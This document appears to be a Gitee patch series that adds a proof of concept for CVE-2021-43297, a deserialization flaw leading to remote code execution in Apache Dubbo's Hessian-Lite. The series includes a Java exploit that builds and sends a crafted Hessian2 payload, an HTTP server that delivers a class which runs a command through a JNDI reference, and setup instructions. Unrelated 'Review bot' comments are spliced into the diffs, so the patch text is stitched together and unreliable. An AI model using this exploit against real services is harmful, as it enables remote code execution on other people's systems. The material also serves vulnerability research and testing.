From 504586fa8515419b80045ccb0236fb53d4334797 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 04:49:53 +0000 Subject: [PATCH 01/20] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20apache-Dubbo?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Dubbo/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Dubbo/.keep diff --git a/cve/apache-Dubbo/.keep b/cve/apache-Dubbo/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 770064a2b91b8213f6f8f57bd5c9cbfd0da03021 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 04:50:11 +0000 Subject: [PATCH 02/20] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Dubbo/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Dubbo/2021/.keep diff --git a/cve/apache-Dubbo/2021/.keep b/cve/apache-Dubbo/2021/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From b197374b85d6be55d46a2fa242c16ce7838b841e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 04:53:21 +0000 Subject: [PATCH 03/20] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Dubbo/2021/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Dubbo/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Dubbo/2021/.keep diff --git a/cve/apache-Dubbo/2021/.keep b/cve/apache-Dubbo/2021/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 2afcbab14d5b4ae8cfad7e4fd96bd8606a4013cd Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 04:58:54 +0000 Subject: [PATCH 04/20] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Dubbo/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Dubbo/2021/.keep diff --git a/cve/apache-Dubbo/2021/.keep b/cve/apache-Dubbo/2021/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 210097b3530b4a3fe57cbbe84b1bdb881092ae3d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:00:37 +0000 Subject: [PATCH 05/20] add cve/apache-Dubbo/2021/README.md. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 凉月 --- cve/apache-Dubbo/2021/README.md | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 cve/apache-Dubbo/2021/README.md diff --git a/cve/apache-Dubbo/2021/README.md b/cve/apache-Dubbo/2021/README.md new file mode 100644 index 00000000..f5be07b7 --- /dev/null +++ b/cve/apache-Dubbo/2021/README.md @@ -0,0 +1,9 @@ +Apache Dubbo Hessian2异常处理时的反序列化(CVE-2021-43297) + + 将两个项目分别导入两个idea + + 先运行org.apache.dubbo.samples.basic.BasicProvider#main启动服务端 + + 再运行org.apache.dubbo.samples.basic.BasicConsumer#main启动客户攻击端 + +https://paper.seebug.org/1814/ \ No newline at end of file -- Gitee From 9f6bbc65b0f941650b050be1092a2d8e98362643 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:04:05 +0000 Subject: [PATCH 06/20] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Dubbo/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Dubbo/yaml/.keep diff --git a/cve/apache-Dubbo/yaml/.keep b/cve/apache-Dubbo/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee 
From 61803d1b6fe1db209e134f0d41c6182d4b755344 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E5=87=89=E6=9C=88?=
Date: Thu, 16 Mar 2023 05:07:03 +0000
Subject: [PATCH 07/20] add CVE-2021-43297.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 凉月
---
 cve/apache-Dubbo/yaml/CVE-2021-43297.yaml | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 cve/apache-Dubbo/yaml/CVE-2021-43297.yaml
diff --git a/cve/apache-Dubbo/yaml/CVE-2021-43297.yaml b/cve/apache-Dubbo/yaml/CVE-2021-43297.yaml
new file mode 100644
index 00000000..84eb42aa
--- /dev/null
+++ b/cve/apache-Dubbo/yaml/CVE-2021-43297.yaml
@@ -0,0 +1,20 @@
+id: CVE-2021-43297
+source: https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297
+info:
+ name: Dubbo是一个高性能优秀的服务框架。
+ severity: high
+ description: |
+ Dubbo是一个高性能优秀的服务框架。CVE-2021-43297中,在Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发远程代码执行。
+ scope-of-influence:
+ Dubbo Hessian-Lite ≤ 3.2.11
+ reference:
+ - https://help.aliyun.com/document_detail/390193.html
+ - https://lists.apache.org/thread/1mszxrvp90y01xob56yp002939c7hlww
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.9
+ cve-id: CVE-2021-43297
+ cwe-id: CWE-502
+ cnvd-id: None
+ kve-id: None
+ tags: cve2021, 数据泄漏
\ No newline at end of file
-- Gitee
From 41934437783230c4399d25e92c985955f4d35a3d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E5=87=89=E6=9C=88?=
Date: Thu, 16 Mar 2023 05:07:17 +0000
Subject: [PATCH 08/20] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Dubbo/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/apache-Dubbo/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/apache-Dubbo/.keep
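Review bot: The `tags: cve2021, 数据泄漏` line at the end of the new file labels the entry as data leakage, while the same file's `cwe-id: CWE-502` and its description describe deserialization leading to remote code execution; a tag that matches the classification (for example `tags: cve2021, 反序列化`, chosen from whatever vocabulary the other entries in the collection use) would keep the index searchable by vulnerability class. The `name:` field holds a product blurb ("Dubbo是一个高性能优秀的服务框架。") rather than a vulnerability title, so a listing of names shows nothing that identifies the issue; a title derived from the description, such as `name: Apache Dubbo Hessian-Lite 反序列化远程代码执行 (CVE-2021-43297)`, would fix that. Neither line is touched by the later update to this file in patch 20/20, so both points still stand at the end of the series.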
diff --git a/cve/apache-Dubbo/.keep b/cve/apache-Dubbo/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From de0f66986c34adda865b105412d34872dde10a2e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:07:25 +0000 Subject: [PATCH 09/20] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Dubbo/2021/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Dubbo/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Dubbo/2021/.keep diff --git a/cve/apache-Dubbo/2021/.keep b/cve/apache-Dubbo/2021/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 07e513257607fe5f7e9aa7fae83489f35f74963d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:07:36 +0000 Subject: [PATCH 10/20] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Dubbo/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Dubbo/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Dubbo/yaml/.keep diff --git a/cve/apache-Dubbo/yaml/.keep b/cve/apache-Dubbo/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 44623aeadb840f80ad2d549e75494cd9aa096c69 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:09:29 +0000 Subject: [PATCH 11/20] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 凉月 --- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index d83e8b4f..bebdec93 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml 
@@ -8,6 +8,8 @@ cve:
 - CVE-2022-24112
 apache-CouchDB:
 - CVE-2022-24706
+ apache-Dubbo:
+ - CVE-2021-43297
 apache-log4j:
 - CVE-2021-44228
 apache-solr:
-- Gitee
From 5778a035de4e2dde6764fc7ca6180703a65084f9 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E5=87=89=E6=9C=88?=
Date: Thu, 16 Mar 2023 05:12:30 +0000
Subject: [PATCH 12/20] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-43297?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/apache-Dubbo/2021/CVE-2021-43297/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/apache-Dubbo/2021/CVE-2021-43297/.keep
diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/.keep b/cve/apache-Dubbo/2021/CVE-2021-43297/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From 05126cc34e55484191d96c6ccf0c5cdc17d15541 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E5=87=89=E6=9C=88?=
Date: Thu, 16 Mar 2023 05:13:24 +0000
Subject: [PATCH 13/20] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Dubbo/2021/README.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/apache-Dubbo/2021/README.md | 9 ---------
 1 file changed, 9 deletions(-)
 delete mode 100644 cve/apache-Dubbo/2021/README.md
diff --git a/cve/apache-Dubbo/2021/README.md b/cve/apache-Dubbo/2021/README.md
deleted file mode 100644
index f5be07b7..00000000
--- a/cve/apache-Dubbo/2021/README.md
+++ /dev/null
@@ -1,9 +0,0 @@
-Apache Dubbo Hessian2异常处理时的反序列化(CVE-2021-43297)
-
- 将两个项目分别导入两个idea
-
- 先运行org.apache.dubbo.samples.basic.BasicProvider#main启动服务端
-
- 再运行org.apache.dubbo.samples.basic.BasicConsumer#main启动客户攻击端
-
-https://paper.seebug.org/1814/
\ No newline at end of file
-- Gitee
From 83d4cf84407d3042843f8106a5e664411fd4b4c9 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E5=87=89=E6=9C=88?=
Date: Thu, 16 Mar 2023 05:14:54 +0000
Subject: [PATCH 14/20] add CVE-2021-43297-POC
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 凉月
---
 cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java | 7 +++++++
 1 file changed, 7 insertions(+)
 create mode 100644 cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java
diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java b/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java
new file mode 100644
index 00000000..9651b3ac
--- /dev/null
+++ b/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java
@@ -0,0 +1,7 @@
+import java.io.IOException;
+public class ExecTest {
+ public ExecTest() throws IOException {
+ new java.io.IOException().printStackTrace();
+ java.lang.Runtime.getRuntime().exec("calc");
+ }
+}
-- Gitee
From a5503810180ef0075dbccab64198c18305afebdd Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E5=87=89=E6=9C=88?=
Date: Thu, 16 Mar 2023 05:15:59 +0000
Subject: [PATCH 15/20] add cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 凉月
---
 .../2021/CVE-2021-43297/HTTPServer.java | 107 ++++++++++++++++++
 1 file changed, 107 insertions(+)
 create mode 100644 cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java
diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java b/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java
new file mode 100644
index 00000000..167cbaef
--- /dev/null
+++ b/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java
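Review bot: `ExecTest` carries no comment saying what it is or who loads it, yet two other files in this series depend on its exact name: `HTTPServer` serves its compiled `ExecTest.class`, and `HessianLitePoc` names it in `new Reference("ExecTest", "ExecTest", "http://127.0.0.1:8080/")`, so renaming the class silently breaks the lab setup. A header comment such as `// Marker class served by HTTPServer; its name must match the Reference built in HessianLitePoc` would record that coupling. The `new java.io.IOException().printStackTrace();` call in the constructor reads like a deliberate "constructor ran" trace rather than error handling; a short comment saying so would stop the next reader from treating it as a leftover.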
@@ -0,0 +1,107 @@ +import com.google.common.io.Files; +import com.sun.net.httpserver.Headers; +import com.sun.net.httpserver.HttpExchange; +import com.sun.net.httpserver.HttpHandler; +import com.sun.net.httpserver.HttpServer; +import com.sun.net.httpserver.spi.HttpServerProvider; +import java.io.BufferedReader; +import java.io.File; +import java.io.IOException; +import java.io.InputStreamReader; +import java.io.OutputStream; +import java.net.InetSocketAddress; +import java.util.Iterator; +import java.util.List; +import java.util.Set; +import org.apache.commons.lang3.StringUtils; + +/** + * 解析http协议,输出http请求体 + * + * @author xuanyh + */ +public class HTTPServer { + + public static String filePath; + public static int PORT = 8080; + public static String contentType; + + public static void main(String[] args) throws IOException { + run(args); + } + + public static void run(String[] args) { + int port = PORT; + String context = "/"; + String clazz = "Calc.class"; + if (args != null && args.length > 0) { + port = Integer.parseInt(args[0]); + context = args[1]; + clazz = args[2]; + } + HttpServerProvider provider = HttpServerProvider.provider(); + HttpServer httpserver = null; + try { + httpserver = provider.createHttpServer(new InetSocketAddress(port), 100); + } catch (IOException e) { + e.printStackTrace(); + } + //监听端口8080, + + httpserver.createContext(context, new RestGetHandler(clazz)); + httpserver.setExecutor(null); + httpserver.start(); + System.out.println("server started"); + } + + static class RestGetHandler implements HttpHandler { + + private String clazz; + + public RestGetHandler(String clazz) { + this.clazz = clazz; + } + + @Override + public void handle(HttpExchange he) throws IOException { + String requestMethod = he.getRequestMethod(); + System.out.println(requestMethod + " " + he.getRequestURI().getPath() + ( + StringUtils.isEmpty(he.getRequestURI().getRawQuery()) ? "" + : "?" 
+ he.getRequestURI().getRawQuery()) + " " + he.getProtocol()); + if (requestMethod.equalsIgnoreCase("GET")) { + Headers responseHeaders = he.getResponseHeaders(); + responseHeaders.set("Content-Type", contentType == null ? "application/json" : contentType); + + he.sendResponseHeaders(200, 0); + // parse request + OutputStream responseBody = he.getResponseBody(); + Headers requestHeaders = he.getRequestHeaders(); + Set keySet = requestHeaders.keySet(); + Iterator iter = keySet.iterator(); + + while (iter.hasNext()) { + String key = iter.next(); + List values = requestHeaders.get(key); + String s = key + ": " + values.toString(); + System.out.println(s); + } + System.out.println(); + BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(he.getRequestBody())); + StringBuilder stringBuilder = new StringBuilder(); + String line; + for (;(line = bufferedReader.readLine()) != null;) { + stringBuilder.append(line); + } + System.out.println(stringBuilder.toString()); + +// byte[] bytes = Files.toByteArray(new File(filePath == null ? HTTPServer.class.getClassLoader().getResource(clazz).getPath() : filePath)); + + byte[] bytes = Files.toByteArray(new File("D:\\工具\\java\\fastjson反序列化\\jndi利用\\ExecTest.class")); + System.out.println(new String(bytes, 0, bytes.length)); + // send response + responseBody.write(bytes); + responseBody.close(); + } + } + } +} \ No newline at end of file -- Gitee From 5c3447b7829c387597b0b46653ca68ea5379467b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:16:51 +0000 Subject: [PATCH 16/20] add cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 凉月 --- .../2021/CVE-2021-43297/HessianLitePoc.java | 133 ++++++++++++++++++ 1 file changed, 133 insertions(+) create mode 100644 cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java 
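Review bot: In `RestGetHandler.handle` the class bytes come from a hard-coded absolute path (`D:\\工具\\java\\fastjson反序列化\\jndi利用\\ExecTest.class`), so the `clazz` constructor argument, the public `filePath` field and the commented-out class-loader lookup directly above it are all dead, and on any other machine `Files.toByteArray` presumably throws after `sendResponseHeaders(200, 0)` has already gone out. Restoring the commented-out line `byte[] bytes = Files.toByteArray(new File(filePath == null ? HTTPServer.class.getClassLoader().getResource(clazz).getPath() : filePath));` and letting `run` set `filePath` from `args` removes the machine dependency. In `run`, a failed `createHttpServer` is only printed, so `httpserver` is still null when `createContext` is called; a `return;` in the catch (or simply letting the IOException propagate, since `main` already declares it) gives a clear failure instead of a NullPointerException. Because `HessianLitePoc` addresses this server as `http://127.0.0.1:8080/`, binding with `new InetSocketAddress("127.0.0.1", port)` keeps the class-serving endpoint off the machine's other interfaces. The exchange is also never closed on non-GET requests; wrapping the handler body in `try { … } finally { he.close(); }` covers both branches.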
diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java b/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java new file mode 100644 index 00000000..04f8ed45 --- /dev/null +++ b/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java 
@@ -0,0 +1,133 @@ +package com.bitterz.dubbo; + +import com.alibaba.com.caucho.hessian.io.Hessian2Output; +import org.apache.dubbo.common.io.Bytes; +import org.apache.xbean.naming.context.ContextUtil; +import org.apache.xbean.naming.context.WritableContext; +import sun.reflect.ReflectionFactory; + +import javax.naming.Context; +import javax.naming.Reference; +import java.io.ByteArrayOutputStream; +import java.io.OutputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationTargetException; +import java.net.Socket; +import java.util.HashSet; +import java.util.Random; +public class HessianLitePoc { + + public static void main(String[] args) throws Exception { + + Context ctx = Reflections.createWithoutConstructor(WritableContext.class); + Reference ref = new Reference("ExecTest", "ExecTest","http://127.0.0.1:8080/"); + ContextUtil.ReadOnlyBinding binding = new ContextUtil.ReadOnlyBinding("foo", ref, ctx); + +// Field fullName = binding.getClass().getSuperclass().getSuperclass().getDeclaredField("fullName"); +// fullName.setAccessible(true); + Reflections.setFieldValue(binding, "fullName", "<<<<<"); +// fullName.set(binding, "<<<<<"); // 方便定位属性值的 + + + + byte [] heder2 = new byte[]{-38, -69, -30, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 1}; + //############################################################################################ + // 写入binding + ByteArrayOutputStream binding2bytes = new ByteArrayOutputStream(); + Hessian2Output outBinding = new Hessian2Output(binding2bytes); + outBinding.writeObject(binding); + outBinding.flushBuffer(); + //############################################################################################ + // binding序列化后的byte数组 + byte[] bindingBytes = binding2bytes.toByteArray(); + + // header. + byte[] header = new byte[16]; + // set magic number. + Bytes.short2bytes((short) 0xdabb, header); + // set request and serialization flag. 
+ header[2] = (byte) ((byte) 0x80 | 0x20 | 2); + // set request id. + Bytes.long2bytes(new Random().nextInt(100000000), header, 4); + // 在header中记录 序列化对象 的长度,因为最后一个F被覆盖了,所以要-1 + Bytes.int2bytes(bindingBytes.length*2-1, header, 12); + + // 收集header+binding + ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); + byteArrayOutputStream.write(header); + byteArrayOutputStream.write(bindingBytes); + byte[] bytes = byteArrayOutputStream.toByteArray(); + + //############################################################################################ + // 组装payload = header+binding+binding + byte[] payload = new byte[bytes.length + bindingBytes.length -1]; + for (int i = 0; i < bytes.length; i++) { + payload[i] = bytes[i]; + } + + for (int i = 0; i < bindingBytes.length; i++) { + payload[i + bytes.length-1] = bindingBytes[i]; + } + //############################################################################################ + + // 修改flag的值 + payload[2] = 0x02; + + // 输出字节流的十六进制 + for (int i = 0; i < payload.length; i++) { + System.out.print(String.format("%02X", payload[i]) + " "); + if ((i + 1) % 8 == 0) + System.out.print(" "); + if ((i + 1) % 16 == 0 ) + System.out.println(); + } + System.out.println(); + // 输出byte数组转String + System.out.println(new String(payload,0,payload.length)); +// System.exit(1); + //todo 此处填写被攻击的dubbo服务提供者地址和端口 + Socket socket = new Socket("127.0.0.1", 20880); + OutputStream outputStream = socket.getOutputStream(); + outputStream.write(payload); + outputStream.flush(); + outputStream.close(); + System.out.println("\nsend!!"); + } + + + public static class Reflections{ + public static void setFieldValue(Object obj, String fieldName, Object fieldValue) throws Exception{ + Field field=null; + Class cl = obj.getClass(); + while (cl != Object.class){ + try{ + field = cl.getDeclaredField(fieldName); + if(field!=null){ + break;} + } + catch (Exception e){ + cl = cl.getSuperclass(); + } + } + if (field==null){ + 
System.out.println(obj.getClass().getName()); + System.out.println(fieldName); + } + field.setAccessible(true); + field.set(obj,fieldValue); + } + + public static T createWithoutConstructor(Class classToInstantiate) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]); + } + + public static T createWithConstructor(Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); + objCons.setAccessible(true); + Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); + sc.setAccessible(true); + return (T) sc.newInstance(consArgs); + } + } +} \ No newline at end of file -- Gitee From 1993cf8699eb23f9e9ca95d895051b6dfe8e51e3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:17:25 +0000 Subject: [PATCH 17/20] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Dubbo/2021/CVE-2021-43297/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Dubbo/2021/CVE-2021-43297/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Dubbo/2021/CVE-2021-43297/.keep diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/.keep b/cve/apache-Dubbo/2021/CVE-2021-43297/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 27dd155c34842fe986b6e99e546c673d08e1db32 Mon Sep 17 00:00:00 2001 
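Review bot: `Reflections.setFieldValue` prints the class and field name when the loop exhausts the hierarchy without finding the field, then dereferences the null `field` at `field.setAccessible(true)`, so a missing field surfaces as a NullPointerException with no message; `throw new NoSuchFieldException(obj.getClass().getName() + "#" + fieldName);` inside that `if` is the explicit failure. The `if (field != null) { break; }` after `getDeclaredField` can never be false, because a miss throws and lands in the `catch` that advances to the superclass, so the check can be dropped for readability. `createWithConstructor` builds on `sun.reflect.ReflectionFactory`, an unsupported internal API; the README's pom pins Java 1.8, and a class comment such as `// Built and run on JDK 8; uses the internal sun.reflect.ReflectionFactory` would save the next reader a puzzling build. The generic type parameters appear to have been stripped by the page extraction (`public static T createWithoutConstructor(Class classToInstantiate)`), so the raw types are presumably not in the original source and are not raised here.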
From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:19:03 +0000 Subject: [PATCH 18/20] add cve/apache-Dubbo/2021/CVE-2021-43297/README.md. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 凉月 --- .../2021/CVE-2021-43297/README.md | 167 ++++++++++++++++++ 1 file changed, 167 insertions(+) create mode 100644 cve/apache-Dubbo/2021/CVE-2021-43297/README.md diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/README.md b/cve/apache-Dubbo/2021/CVE-2021-43297/README.md new file mode 100644 index 00000000..adc6afef --- /dev/null +++ b/cve/apache-Dubbo/2021/CVE-2021-43297/README.md 
@@ -0,0 +1,167 @@ +漏洞描述 + +Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。 +Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发RCE攻击。 +环境安装和Poc运行 + + 首先下载zookeeper + +wget http://archive.apache.org/dist/zookeeper/zookeeper-3.3.3/zookeeper-3.3.3.tar.gz +tar zxvf zookeeper-3.3.3.tar.gz +cd zookeeper-3.3.3 +cp conf/zoo_sample.cfg conf/zoo.cfg + + 配置 + +vim conf/zoo.cfg +# The number of milliseconds of each tick +tickTime=2000 +# The number of ticks that the initial +# synchronization phase can take +initLimit=10 +# The number of ticks that can pass between +# sending a request and getting an acknowledgement +syncLimit=5 +# the directory where the snapshot is stored. +dataDir=/绝对路径/zookeeper-3.3.3/data +# the port at which the clients will connect +clientPort=2181 + + 修改绝对路径,在data目录下放置一个myid文件 + +mkdir data +touch data/myid + + 启动zookeeper + +cd /private/var/tmp/zookeeper-3.3.3/bin +./zkServer.sh start + + 安装dubbo-samples-api + +git clone https://github.com/apache/dubbo-samples.git +cd dubbo-samples/dubbo-samples-api + + 修改dubbo-samples/dubbo-samples-api/pom.xml + + + + 4.0.0 + + org.example + dubbomytest + pom + 1.0-SNAPSHOT + + + + org.apache.maven.plugins + maven-compiler-plugin + + 8 + 8 + + + + + + + + 1.8 + 1.8 + 2.7.6 + 4.12 + 0.30.0 + 1.2.0 + 3.7.0 + 2.21.0 + ${project.artifactId}:${dubbo.version} + openjdk:8 + 20880 + 2181 + org.apache.dubbo.samples.provider.Application + + + + + org.apache.dubbo + dubbo + 2.7.3 + + + org.apache.dubbo + dubbo-common + 2.7.3 + + + + org.apache.dubbo + dubbo-dependencies-zookeeper + 2.7.3 + pom + + + org.apache.xbean + xbean-naming + 4.15 + + + junit + junit + ${junit.version} + test + + + + + + + xbean包 + +provider端和本地都需要安装,依赖如下 + + + org.apache.xbean + xbean-naming + 4.15 + + + 编译启动 + +IDEA中添加dubbo-samples-api,注意修改zookeeper和dubbo的端口,另外在Application.java中修改代码: + +service.setRegistry(new RegistryConfig("zookeeper://" + zookeeperHost + ":" + zookeeperPort+"/?timeout=250000")); + +防止高版本dubbo连接zookeeper过慢而连接失败 + 
+在idea里面启动dubbo-samples-api中的Application.java + +启动后输出dubbo service started即表示dubbo已启动 + + 运行poc 本地添加依赖: + + + org.apache.dubbo + dubbo-common + 2.7.3 + + + org.apache.dubbo + dubbo + 2.7.3 + + + org.apache.dubbo + dubbo-dependencies-zookeeper + 2.7.3 + pom + + + com.caucho + hessian + 4.0.51 + + +编译ExecTest.java,随后在HttpServer.java中修改ExecTest.class的路径,然后执行HttpServer.main方法,最后执行HessianLitePoc.main方法 \ No newline at end of file -- Gitee From 9247e4cc28ac47d446ea613ceee2bdd7464833d7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:20:02 +0000 Subject: [PATCH 19/20] update cve/apache-Dubbo/2021/CVE-2021-43297/README.md. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 凉月 --- .../2021/CVE-2021-43297/README.md | 164 +----------------- 1 file changed, 1 insertion(+), 163 deletions(-) diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/README.md b/cve/apache-Dubbo/2021/CVE-2021-43297/README.md index adc6afef..b47312f3 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-43297/README.md +++ b/cve/apache-Dubbo/2021/CVE-2021-43297/README.md 
